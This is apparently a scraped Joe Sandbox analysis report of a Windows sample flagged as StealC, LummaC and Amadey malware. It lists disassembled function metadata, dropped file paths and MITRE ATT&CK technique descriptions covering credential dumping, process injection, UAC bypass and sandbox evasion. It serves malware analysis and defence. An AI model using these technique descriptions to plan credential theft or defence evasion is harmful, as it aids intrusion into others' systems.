Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Unlock$IdentityUniqueValuecallocfreemallocmemcpystrcpystrlen
String ID: SSL
API String ID: 2424436289-2135378647
Opcode ID: 0857ae78e00c07ee2446e74740dfcfa9a5950435b2d4e0941f481cdfe6116025
Instruction ID: 9ed6af601195e333c29f6fa48da807d82a71f9ab07a863909e0e82c3b5654c48
Opcode Fuzzy Hash: 0857ae78e00c07ee2446e74740dfcfa9a5950435b2d4e0941f481cdfe6116025
Instruction Fuzzy Hash: 85214DB2609A48AADE30DF53B6433227AB5B302A0D7507528C5A90BB35D731580CEFD7

Function 6C70C810 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36timeCOMMON

Download Yara Rule

APIs

CERT_CheckCertValidTimes.NSS3(?,00000000,-00000078,00000000,?,00000000,]pl,6C706499,-00000078,00000000,?,?,]pl,?,6C705DEF,?), ref: 6C70C821

Part of subcall function 6C701DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C701E0B
Part of subcall function 6C701DD0: DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C701E24

SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,00000000,?,?,]pl,?,6C705DEF,?,?,?), ref: 6C70C857

Strings

]pl, xrefs: 6C70C810

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Choice_DecodeTimeUtil$CertCheckDestroyPublicTimesValid
String ID: ]pl
API String ID: 221937774-604039184
Opcode ID: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction ID: dcaf81ea0b10acab79fa3e5b5ec2b21a769a5e2ef0cb80e9d0949d3cef0494d5
Opcode Fuzzy Hash: 8b4586f9bf7fe022698438743c8cc7a435e02df9751e3daf09b6801118977999
Instruction Fuzzy Hash: 82F0A7B7B0011477EF016966AD0DAFF3699EF8115AF080031FE18D6641F722C92583F6

Function 6C6F0F00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16COMMON

Download Yara Rule

APIs

PR_GetPageSize.NSS3(6C6F0936,FFFFE8AE,?,6C6816B7,00000000,?,6C6F0936,00000000,?,6C68204A), ref: 6C6F0F1B

Part of subcall function 6C6F1370: GetSystemInfo.KERNEL32(?,?,?,?,6C6F0936,?,6C6F0F20,6C6F0936,FFFFE8AE,?,6C6816B7,00000000,?,6C6F0936,00000000), ref: 6C6F138F

PR_NewLogModule.NSS3(clock,6C6F0936,FFFFE8AE,?,6C6816B7,00000000,?,6C6F0936,00000000,?,6C68204A), ref: 6C6F0F25

Part of subcall function 6C6F1110: calloc.MOZGLUE(00000001,0000000C,?,?,?,?,?,?,?,?,?,?,6C6F0936,00000001,00000040), ref: 6C6F1130
Part of subcall function 6C6F1110: strdup.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6F0936,00000001,00000040), ref: 6C6F1142
Part of subcall function 6C6F1110: PR_GetEnvSecure.NSS3(NSPR_LOG_MODULES,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6F0936,00000001), ref: 6C6F1167

Strings

clock, xrefs: 6C6F0F20

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: InfoModulePageSecureSizeSystemcallocstrdup
String ID: clock
API String ID: 536403800-3195780754
Opcode ID: c4d66e155ffd04418212dcef59f462abeecf75adf3e97c47e3b2bf8a1f4af04c
Instruction ID: 8ea5dc0fdeb572ddc68a14517699865533082cf2c2b4ea3ede2659a28b8fee16
Opcode Fuzzy Hash: c4d66e155ffd04418212dcef59f462abeecf75adf3e97c47e3b2bf8a1f4af04c
Instruction Fuzzy Hash: F1D0227220411491C12062979C44BA6B2AEC7C32FDF002872E12C41E000E6950DBD2EE

Function 6C760DB0 Relevance: 5.1, APIs: 4, Instructions: 97COMMON

Download Yara Rule

APIs

calloc.MOZGLUE ref: 6C760DF5
TlsGetValue.KERNEL32 ref: 6C760E2D
TlsGetValue.KERNEL32 ref: 6C760E58
TlsGetValue.KERNEL32 ref: 6C760E84

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Value$calloc
String ID:
API String ID: 3339632435-0
Opcode ID: 0b8f6c28ea62eabf00fc86ac4c1a4974c407677279c77976ff2d28d756b74744
Instruction ID: 96f0fec2b1f4a9684ce915dc9fc8fdd385de3ebf36ec2019fbfb75a5fb641d06
Opcode Fuzzy Hash: 0b8f6c28ea62eabf00fc86ac4c1a4974c407677279c77976ff2d28d756b74744
Instruction Fuzzy Hash: 5D31A3B06443A18BDB117F7ACA4526977B8BF0630CF114679DC9987E21DB349485CBCA

Function 6C760F10 Relevance: 5.1, APIs: 4, Instructions: 52stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C702AF5,?,?,?,?,?,6C700A1B,00000000), ref: 6C760F1A
malloc.MOZGLUE(00000001), ref: 6C760F30
memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C760F42
TlsGetValue.KERNEL32 ref: 6C760F5B

Memory Dump Source

Source File: 00000000.00000002.2069795405.000000006C681000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C680000, based on PE: true

Associated: 00000000.00000002.2069746784.000000006C680000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070176960.000000006C81F000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070310731.000000006C85E000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070366711.000000006C85F000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070410535.000000006C860000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2070454258.000000006C865000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c680000_file.jbxd

Similarity

API ID: Valuemallocmemcpystrlen
String ID:
API String ID: 2332725481-0
Opcode ID: 70e48b9b4c059a7ac2c2f1c23004ba468bcf234f065b7eead1bae1209599e99f
Instruction ID: 17704c292ffd0ea5a058ce13f17ed074e2c435de6ac78f852b8bc71c69f2670b
Opcode Fuzzy Hash: 70e48b9b4c059a7ac2c2f1c23004ba468bcf234f065b7eead1bae1209599e99f
Instruction Fuzzy Hash: A801DDB1A0024157E721173F9F045A67AACEF5335DB010571EC1DC2E22D730C849C6D6

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Command: Command Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Amadey

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\CAFIEBKK

C:\ProgramData\CGCFIIEBKEGHJJJJJJDA

C:\ProgramData\EShineEncoder\EShineEncoder.exe

C:\ProgramData\EShineEncoder\sqlite3.dll

C:\ProgramData\FCBAECGIEBKKFHIDAKEC

Windows Analysis Report
file.exe

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre